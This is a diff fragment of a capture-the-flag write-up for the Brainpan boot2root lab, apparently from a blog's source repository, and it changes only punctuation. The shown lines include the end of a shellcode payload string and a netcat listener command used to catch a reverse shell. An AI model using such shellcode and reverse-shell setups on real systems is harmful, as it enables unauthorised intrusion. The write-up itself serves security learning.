PacketFire/packetfire_site/content/post/brainpan-boot2root-writeup.md

 payload += "\x37\xa3\x69"
 ```

 Again, I replaced the previous shellcode with the above payload before opening up a netcat listener on my local desktop.
-Upon running the exploit I was happy to see that my listener caught a shell.
+Upon running the exploit, I was happy to see that my listener caught a shell.

 ```
 ~> nc -lvnp 4444